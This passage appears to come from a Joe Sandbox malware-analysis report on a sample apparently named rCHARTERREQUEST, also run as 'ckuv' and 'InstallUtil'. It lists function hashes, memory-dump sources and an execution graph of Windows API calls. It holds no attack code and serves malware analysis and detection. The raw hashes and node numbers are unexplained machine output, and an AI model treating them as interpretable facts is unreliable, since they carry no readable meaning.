                                                                                                          • Instruction Fuzzy Hash: 2231CFB1E056188BEB5DCF5B8C4069AFAFBAFC9300F04D0BA990CA6254DB740B818F05
                                                                                                          Function 01803D98 Relevance: .1, Instructions: 70COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1917776226.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1800000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d537ff2701199152850978041330dd24376244a83565fe5bf83b07906701aa64
                                                                                                          • Instruction ID: cc363fb076507afc878c10558de9a194207ecdba3fe17814eeeac20e43ca9907
                                                                                                          • Opcode Fuzzy Hash: d537ff2701199152850978041330dd24376244a83565fe5bf83b07906701aa64
                                                                                                          • Instruction Fuzzy Hash: 3B318AB1E016189BEB58CF5BCD4878EFBF7AFC9304F14C1A9C408AA264DB740A458F41
                                                                                                          Function 01803DA8 Relevance: .1, Instructions: 68COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1917776226.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1800000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0133c77a3b427a60e559909a747fc461a56185c78c0761ea4d4558f779259b85
                                                                                                          • Instruction ID: 311d5e2f045dbfc1cfa211a52ed43e8c880b563e489b9b0c4fee8e0fcc20dea5
                                                                                                          • Opcode Fuzzy Hash: 0133c77a3b427a60e559909a747fc461a56185c78c0761ea4d4558f779259b85
                                                                                                          • Instruction Fuzzy Hash: D73167B1E056189BEB59CF5BCD4878EFAF7AFC9304F14C1A9C80CAA264DB740A458F41
                                                                                                          Function 06D41710 Relevance: 7.6, Strings: 6, Instructions: 148COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
                                                                                                          • API String ID: 0-723292480
                                                                                                          • Opcode ID: 73536a33379e6f058419dce2976f2e203b734c0da2b14c663e9bd06a622a06c7
                                                                                                          • Instruction ID: 21b79e25b9e449af0b63641af8809c111d6498e580a018d6caa5493692aba467
                                                                                                          • Opcode Fuzzy Hash: 73536a33379e6f058419dce2976f2e203b734c0da2b14c663e9bd06a622a06c7
                                                                                                          • Instruction Fuzzy Hash: 90517130A402099FC758EB79C9506AEBBE7BFC8304F148928C44A9B758DF75DD468BA1
                                                                                                          Function 06D48140 Relevance: 5.2, Strings: 4, Instructions: 213COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (_^q$(_^q$(_^q$(_^q
                                                                                                          • API String ID: 0-2697572114
                                                                                                          • Opcode ID: 10caf1ba1da80515a971702f1a363e1cf2a141b2215d3bbcdcde5dc4e9acb7a8
                                                                                                          • Instruction ID: eccbf19f77859e26f4d54493b7a58a029830c3ee1f3237d754c2a6b4de0ee3f0
                                                                                                          • Opcode Fuzzy Hash: 10caf1ba1da80515a971702f1a363e1cf2a141b2215d3bbcdcde5dc4e9acb7a8
                                                                                                          • Instruction Fuzzy Hash: A671D474F042148FC745AF78D8549AE7BB2EF86340B144569E846EB351EB32DC46CBE1

                                                                                                          Executed Functions

                                                                                                          Function 025A08A8 Relevance: 1.5, Strings: 1, Instructions: 229COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2924590630.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_25a0000_ckuv.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Te^q
                                                                                                          • API String ID: 0-671973202
                                                                                                          • Opcode ID: 444e6a55f200fc45dfefdc9d37890902773c33155b5d889e4e4d6c7799874400
                                                                                                          • Instruction ID: 1978777a0a3353e2b5d0e64d4f3a5a8e29c3f801b538e862f8c3e8931867ed26
                                                                                                          • Opcode Fuzzy Hash: 444e6a55f200fc45dfefdc9d37890902773c33155b5d889e4e4d6c7799874400
                                                                                                          • Instruction Fuzzy Hash: 6A8193347002049FC704EB79D958B6EBBE2BF89714F1484A9E049DB3A6DF359C46CB91
                                                                                                          Function 025A253C Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2924590630.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_25a0000_ckuv.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ZlCS
                                                                                                          • API String ID: 0-3977190934
                                                                                                          • Opcode ID: 66a4b976b7658e372a911f47d162088c78988647f1d4e49bc97decd01ed83359
                                                                                                          • Instruction ID: 5c0b8fb357d8bc43656a1ff5953b15e3d7dde14579464b5d4bcf1e947e1d2ce2
                                                                                                          • Opcode Fuzzy Hash: 66a4b976b7658e372a911f47d162088c78988647f1d4e49bc97decd01ed83359
                                                                                                          • Instruction Fuzzy Hash: 993137B0D012489FDB14CFA9C591ADEBFF1BF48304F248069E909AB250DB349942CF94
                                                                                                          Function 025A2548 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2924590630.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_25a0000_ckuv.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ZlCS
                                                                                                          • API String ID: 0-3977190934
                                                                                                          • Opcode ID: d0ac3d49c08a46aa01bcef5cc1db47bb9ad8dccc495f25d15aac6d674bfb350d
                                                                                                          • Instruction ID: f05010e8bd62cefbbece9b7e585b3920a235e24ed378252583c5786951cbe1ae
                                                                                                          • Opcode Fuzzy Hash: d0ac3d49c08a46aa01bcef5cc1db47bb9ad8dccc495f25d15aac6d674bfb350d
                                                                                                          • Instruction Fuzzy Hash: 333135B0D012489FDB14CFAAC591ADEBFF5BF48304F248029E909AB250DB349945CFA4
                                                                                                          Function 025A1B71 Relevance: .1, Instructions: 100COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2924590630.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_25a0000_ckuv.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: da197aba217b6c3b60b6dbbab73f905ecdea3a8a03486546f84299252387fa23
                                                                                                          • Instruction ID: 1cce193da55264380e86dd01cd2c4c027f0bfa41ce422e83240020268a5ef546
                                                                                                          • Opcode Fuzzy Hash: da197aba217b6c3b60b6dbbab73f905ecdea3a8a03486546f84299252387fa23
                                                                                                          • Instruction Fuzzy Hash: 1B31A230700504CFDB15AB68E46A7BD37F3BBC9316F148569D00A8B794DB75988ACB85
                                                                                                          Function 025A1BED Relevance: .1, Instructions: 66COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2924590630.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_25a0000_ckuv.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 01f5efd395454166b32771a5bd4efdf585463a72cc6d3bee9e33f4426692de53
                                                                                                          • Instruction ID: fbc295122df49a835bc1aff8b949df01b12e270dcb83437034b363171c7b5a23
                                                                                                          • Opcode Fuzzy Hash: 01f5efd395454166b32771a5bd4efdf585463a72cc6d3bee9e33f4426692de53
                                                                                                          • Instruction Fuzzy Hash: F6217F30740114CFCB15ABA4E06A7BD37F3ABC9316F144469D00A8B754DF75D98A8B85
                                                                                                          Function 025A089A Relevance: .1, Instructions: 56COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2924590630.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_25a0000_ckuv.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7c78a0c20b1b948fb981c4a00973393883b531523c266ac40a698a35b87674cd
                                                                                                          • Instruction ID: 867f6cb920fbbbeb8de9a035b39e8af0b873d443e7102a9e65d9c6a446999c46
                                                                                                          • Opcode Fuzzy Hash: 7c78a0c20b1b948fb981c4a00973393883b531523c266ac40a698a35b87674cd
                                                                                                          • Instruction Fuzzy Hash: B51121317002045FC305AB399858B2EAFE3BBC5714F1484A9D049CF3A2DF358C06CB91
                                                                                                          Function 00B1D785 Relevance: .0, Instructions: 45COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2921914102.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_b1d000_ckuv.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 31d0cc4ad1a4bfedffa3f3609a5b0d1e7333f2962a736f41c1f81d296ba0b90d
                                                                                                          • Instruction ID: 2e6ec343eed23c531b467003c2b85340180ed966c23ad29682baa37ba0980933
                                                                                                          • Opcode Fuzzy Hash: 31d0cc4ad1a4bfedffa3f3609a5b0d1e7333f2962a736f41c1f81d296ba0b90d
                                                                                                          • Instruction Fuzzy Hash: BA01A7310093409AE7109B2ACDC4BA7BFD8DF45324F58C5AAED194A1C6C6799C80CA71
                                                                                                          Function 025A0948 Relevance: .0, Instructions: 43COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2924590630.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_25a0000_ckuv.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c4954277f76b790bce4a877d58c2d88a89544e400e841c328ec16c9ed0a3de5c
                                                                                                          • Instruction ID: 00bb4ce118e359f406103e5e2603690720573853ef6b7c289e3351b23e367837
                                                                                                          • Opcode Fuzzy Hash: c4954277f76b790bce4a877d58c2d88a89544e400e841c328ec16c9ed0a3de5c
                                                                                                          • Instruction Fuzzy Hash: 2901F2383002048FC300EB28D554B4ABBE2FB85324F1084A6D048CF3A6DB31EC4ACFA0
                                                                                                          Function 00B1D784 Relevance: .0, Instructions: 36COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2921914102.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_b1d000_ckuv.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2e160281147214f52316d057ca29e4350ff5d2ac910a457858d0e13ceb1008ba
                                                                                                          • Instruction ID: b7672cb257b7142d3efc21cd72fd5d690205e914de4b8279147152706c36f01e
                                                                                                          • Opcode Fuzzy Hash: 2e160281147214f52316d057ca29e4350ff5d2ac910a457858d0e13ceb1008ba
                                                                                                          • Instruction Fuzzy Hash: 33F062714043449EE7108F1ACCC4BA2FFE8EF55724F18C45AED084B286C2799C84CA71
                                                                                                          Function 025A0BD0 Relevance: .0, Instructions: 17COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2924590630.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_25a0000_ckuv.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8c2d6ece071952b2959dd87443be46f744cd3cacf647523b5f9be6024a51401d
                                                                                                          • Instruction ID: 7df0dc14242db2b476b4b6c0d12064003c8e1c2146b63a6f325b3f899c12f641
                                                                                                          • Opcode Fuzzy Hash: 8c2d6ece071952b2959dd87443be46f744cd3cacf647523b5f9be6024a51401d
                                                                                                          • Instruction Fuzzy Hash: 74C01272A4D2804FCF024B185C187C4BF70AF21105F090395DC46A7813C56524178B44
                                                                                                          Function 025A1401 Relevance: .0, Instructions: 16COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2924590630.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_25a0000_ckuv.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a5dd83afc7a82b81ac773bc7716eafb11197c3bcf4a6ca8997e300da55488059
                                                                                                          • Instruction ID: fec0399a5a2dbf49417c41e7d164961699ad04b200bf9dff6eb6c034eee98dea
                                                                                                          • Opcode Fuzzy Hash: a5dd83afc7a82b81ac773bc7716eafb11197c3bcf4a6ca8997e300da55488059
                                                                                                          • Instruction Fuzzy Hash: C5D0123341D6908FCB121B18983222C7B707B13621B154896C5A59B1A2E6148A0DD77E
                                                                                                          Function 025A0881 Relevance: .0, Instructions: 10COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2924590630.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_25a0000_ckuv.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 90f5b7dde0f5f1136c7ed0b5dc4be303a37d55f5b6d405611e1a2b5012cd9011
                                                                                                          • Instruction ID: 2bf77570f2d7ac24ef803113a7d62cfd3a0c696d1caf920c8fe62f1ea47575ea
                                                                                                          • Opcode Fuzzy Hash: 90f5b7dde0f5f1136c7ed0b5dc4be303a37d55f5b6d405611e1a2b5012cd9011
                                                                                                          • Instruction Fuzzy Hash: 94C092A640E3C34EEF130F202AA61C47F222C6334D71A24C3C488EBA67D602050EC722
                                                                                                          Function 025A0BF0 Relevance: .0, Instructions: 5COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2924590630.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_25a0000_ckuv.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b3a69414feed2a7f8787268e30701f3d9b8bbc3327a8ea5e384ba448260d1bee
                                                                                                          • Instruction ID: 4cca89bd2edd93922fb65f5fdb6d51700b378467505b27a1bf5ddf9c4d5ab82d
                                                                                                          • Opcode Fuzzy Hash: b3a69414feed2a7f8787268e30701f3d9b8bbc3327a8ea5e384ba448260d1bee
                                                                                                          • Instruction Fuzzy Hash: C890223008820C8F000033803C08800BB0C80000003800000A00C022028E2020000088

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:9.6%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:164
                                                                                                          Total number of Limit Nodes:16
                                                                                                          execution_graph 43642 5f0d4f0 43643 5f0d558 CreateWindowExW 43642->43643 43645 5f0d614 43643->43645 43645->43645 43646 5f03050 DuplicateHandle 43647 5f030e6 43646->43647 43711 7c0848 43713 7c084e 43711->43713 43712 7c091b 43713->43712 43717 5f01d00 43713->43717 43721 5f01d83 43713->43721 43727 5f01cf0 43713->43727 43718 5f01d0f 43717->43718 43731 5f01464 43718->43731 43723 5f01d13 43721->43723 43726 5f01d8a 43721->43726 43722 5f01d57 43722->43713 43723->43722 43724 5f01464 3 API calls 43723->43724 43725 5f01d30 43724->43725 43725->43713 43726->43713 43728 5f01d0f 43727->43728 43729 5f01464 3 API calls 43728->43729 43730 5f01d30 43729->43730 43730->43713 43732 5f0146f 43731->43732 43735 5f02bcc 43732->43735 43734 5f036b6 43736 5f02bd7 43735->43736 43737 5f03ddc 43736->43737 43739 5f05a68 43736->43739 43737->43734 43740 5f05a89 43739->43740 43741 5f05aad 43740->43741 43743 5f05c18 43740->43743 43741->43737 43744 5f05c25 43743->43744 43745 5f05c5e 43744->43745 43747 5f04e28 43744->43747 43745->43741 43748 5f04e33 43747->43748 43750 5f05cd0 43748->43750 43751 5f04e5c 43748->43751 43750->43750 43752 5f04e67 43751->43752 43758 5f04e6c 43752->43758 43754 5f05d3f 43762 5f0b038 43754->43762 43770 5f0b050 43754->43770 43755 5f05d79 43755->43750 43761 5f04e77 43758->43761 43759 5f06fc8 43759->43754 43760 5f05a68 3 API calls 43760->43759 43761->43759 43761->43760 43764 5f0b081 43762->43764 43765 5f0b181 43762->43765 43763 5f0b08d 43763->43755 43764->43763 43769 5f0b0cd 43764->43769 43778 5f0b2c8 43764->43778 43765->43755 43782 5f0c5c8 43769->43782 43792 5f0c5b9 43769->43792 43772 5f0b181 43770->43772 43773 5f0b081 43770->43773 43771 5f0b08d 43771->43755 43772->43755 43773->43771 43774 5f0b0cd 43773->43774 43777 5f0b2c8 3 API calls 43773->43777 43775 5f0c5c8 GetModuleHandleW 43774->43775 43776 5f0c5b9 GetModuleHandleW 43774->43776 43775->43772 43776->43772 43777->43774 43802 5f0b318 43778->43802 43811 5f0b308 43778->43811 43779 5f0b2d2 43779->43769 43783 5f0c5f3 43782->43783 43820 5f0a37c 43783->43820 43786 5f0c676 43788 5f0c6a2 43786->43788 43835 5f0a2ac 43786->43835 43791 5f0a37c GetModuleHandleW 43791->43786 43793 5f0c5f3 43792->43793 43794 5f0a37c GetModuleHandleW 43793->43794 43795 5f0c65a 43794->43795 43799 5f0cb20 GetModuleHandleW 43795->43799 43800 5f0ca78 GetModuleHandleW 43795->43800 43801 5f0a37c GetModuleHandleW 43795->43801 43796 5f0c676 43797 5f0a2ac GetModuleHandleW 43796->43797 43798 5f0c6a2 43796->43798 43797->43798 43799->43796 43800->43796 43801->43796 43803 5f0b34c 43802->43803 43804 5f0b329 43802->43804 43803->43779 43805 5f0a2ac GetModuleHandleW 43804->43805 43806 5f0b334 43805->43806 43806->43803 43810 5f0b5a2 GetModuleHandleW 43806->43810 43807 5f0b344 43807->43803 43808 5f0b550 GetModuleHandleW 43807->43808 43809 5f0b57d 43808->43809 43809->43779 43810->43807 43812 5f0b30d 43811->43812 43813 5f0a2ac GetModuleHandleW 43812->43813 43815 5f0b34c 43812->43815 43814 5f0b334 43813->43814 43814->43815 43819 5f0b5a2 GetModuleHandleW 43814->43819 43815->43779 43816 5f0b550 GetModuleHandleW 43818 5f0b57d 43816->43818 43817 5f0b344 43817->43815 43817->43816 43818->43779 43819->43817 43821 5f0a387 43820->43821 43822 5f0c65a 43821->43822 43823 5f0cc90 GetModuleHandleW 43821->43823 43824 5f0cc80 GetModuleHandleW 43821->43824 43822->43791 43825 5f0ca78 43822->43825 43830 5f0cb20 43822->43830 43823->43822 43824->43822 43826 5f0ca88 43825->43826 43827 5f0ca93 43826->43827 43828 5f0cc90 GetModuleHandleW 43826->43828 43829 5f0cc80 GetModuleHandleW 43826->43829 43827->43786 43828->43827 43829->43827 43831 5f0cb4d 43830->43831 43832 5f0cbce 43831->43832 43833 5f0cc90 GetModuleHandleW 43831->43833 43834 5f0cc80 GetModuleHandleW 43831->43834 43833->43832 43834->43832 43836 5f0b508 GetModuleHandleW 43835->43836 43838 5f0b57d 43836->43838 43838->43788 43648 77d030 43649 77d048 43648->43649 43650 77d0a2 43649->43650 43655 5f0d697 43649->43655 43659 5f0a48c 43649->43659 43668 5f0d6a8 43649->43668 43672 5f0e7f8 43649->43672 43656 5f0d6a5 43655->43656 43657 5f0a48c CallWindowProcW 43656->43657 43658 5f0d6ef 43657->43658 43658->43650 43662 5f0a497 43659->43662 43660 5f0e869 43697 5f0e46c 43660->43697 43662->43660 43663 5f0e859 43662->43663 43681 5f0e990 43663->43681 43686 5f0e980 43663->43686 43691 5f0ea5c 43663->43691 43664 5f0e867 43669 5f0d6ce 43668->43669 43670 5f0a48c CallWindowProcW 43669->43670 43671 5f0d6ef 43670->43671 43671->43650 43675 5f0e835 43672->43675 43673 5f0e869 43674 5f0e46c CallWindowProcW 43673->43674 43677 5f0e867 43674->43677 43675->43673 43676 5f0e859 43675->43676 43678 5f0e990 CallWindowProcW 43676->43678 43679 5f0e980 CallWindowProcW 43676->43679 43680 5f0ea5c CallWindowProcW 43676->43680 43678->43677 43679->43677 43680->43677 43682 5f0e9a4 43681->43682 43701 5f0ea48 43682->43701 43704 5f0ea38 43682->43704 43683 5f0ea30 43683->43664 43688 5f0e991 43686->43688 43687 5f0ea30 43687->43664 43689 5f0ea48 CallWindowProcW 43688->43689 43690 5f0ea38 CallWindowProcW 43688->43690 43689->43687 43690->43687 43692 5f0ea1a 43691->43692 43693 5f0ea6a 43691->43693 43695 5f0ea48 CallWindowProcW 43692->43695 43696 5f0ea38 CallWindowProcW 43692->43696 43694 5f0ea30 43694->43664 43695->43694 43696->43694 43698 5f0e477 43697->43698 43699 5f0fcca CallWindowProcW 43698->43699 43700 5f0fc79 43698->43700 43699->43700 43700->43664 43702 5f0ea59 43701->43702 43708 5f0fc15 43701->43708 43702->43683 43705 5f0ea48 43704->43705 43706 5f0ea59 43705->43706 43707 5f0fc15 CallWindowProcW 43705->43707 43706->43683 43707->43706 43709 5f0e46c CallWindowProcW 43708->43709 43710 5f0fc1a 43709->43710 43710->43702 43839 7cea80 43840 7ceac6 GlobalMemoryStatusEx 43839->43840 43841 7ceaf6 43840->43841

                                                                                                          Executed Functions

                                                                                                          Function 05F13100 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 654 5f13100-5f13121 655 5f13123-5f13126 654->655 656 5f13128-5f13147 655->656 657 5f1314c-5f1314f 655->657 656->657 658 5f138f0-5f138f2 657->658 659 5f13155-5f13174 657->659 660 5f138f4 658->660 661 5f138f9-5f138fc 658->661 667 5f13176-5f13179 659->667 668 5f1318d-5f13197 659->668 660->661 661->655 663 5f13902-5f1390b 661->663 667->668 669 5f1317b-5f1318b 667->669 671 5f1319d-5f131ac 668->671 669->671 780 5f131ae call 5f13920 671->780 781 5f131ae call 5f13918 671->781 673 5f131b3-5f131b8 674 5f131c5-5f134a2 673->674 675 5f131ba-5f131c0 673->675 696 5f138e2-5f138ef 674->696 697 5f134a8-5f13557 674->697 675->663 706 5f13580 697->706 707 5f13559-5f1357e 697->707 709 5f13589-5f1359c 706->709 707->709 711 5f135a2-5f135c4 709->711 712 5f138c9-5f138d5 709->712 711->712 715 5f135ca-5f135d4 711->715 712->697 713 5f138db 712->713 713->696 715->712 716 5f135da-5f135e5 715->716 716->712 717 5f135eb-5f136c1 716->717 729 5f136c3-5f136c5 717->729 730 5f136cf-5f136ff 717->730 729->730 734 5f13701-5f13703 730->734 735 5f1370d-5f13719 730->735 734->735 736 5f13779-5f1377d 735->736 737 5f1371b-5f1371f 735->737 738 5f13783-5f137bf 736->738 739 5f138ba-5f138c3 736->739 737->736 740 5f13721-5f1374b 737->740 751 5f137c1-5f137c3 738->751 752 5f137cd-5f137db 738->752 739->712 739->717 747 5f13759-5f13776 740->747 748 5f1374d-5f1374f 740->748 747->736 748->747 751->752 754 5f137f2-5f137fd 752->754 755 5f137dd-5f137e8 752->755 759 5f13815-5f13826 754->759 760 5f137ff-5f13805 754->760 755->754 758 5f137ea 755->758 758->754 764 5f13828-5f1382e 759->764 765 5f1383e-5f1384a 759->765 761 5f13807 760->761 762 5f13809-5f1380b 760->762 761->759 762->759 766 5f13830 764->766 767 5f13832-5f13834 764->767 769 5f13862-5f138b3 765->769 770 5f1384c-5f13852 765->770 766->765 767->765 769->739 771 5f13854 770->771 772 5f13856-5f13858 770->772 771->769 772->769 780->673 781->673
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2402495122.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_5f10000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-2392861976
                                                                                                          • Opcode ID: 7ed75d8ffa9613ff1be4ba821bfeee6292f19d092b94ff7c5df162b5fca4a6c2
                                                                                                          • Instruction ID: cb6e844716d8df7018776f48d2e1cce06b850d8b1aa788d79b7c7b238bd3d123
                                                                                                          • Opcode Fuzzy Hash: 7ed75d8ffa9613ff1be4ba821bfeee6292f19d092b94ff7c5df162b5fca4a6c2
                                                                                                          • Instruction Fuzzy Hash: FE321231E1071ACFCB14DF75C85499DB7B6BF89300F14CAAAD409AB258EF34A985CB91
                                                                                                          Function 05F1B2A2 Relevance: .6, Instructions: 558COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2402495122.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_5f10000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a6b7fb3bf817eec2c84a6992fd6e411ae6c20ba3675654d189900543497c7d68
                                                                                                          • Instruction ID: cdf50e525b696a00f3c4d682a1dff275164bf32bcc53d74d387ca80a4195812c
                                                                                                          • Opcode Fuzzy Hash: a6b7fb3bf817eec2c84a6992fd6e411ae6c20ba3675654d189900543497c7d68
                                                                                                          • Instruction Fuzzy Hash: 5B226D34E00209CFDF24DB68C594BADB7B2FB49310F208926E859EB395DA39DD81CB55
                                                                                                          Function 05F1AD48 Relevance: 12.9, Strings: 10, Instructions: 391COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
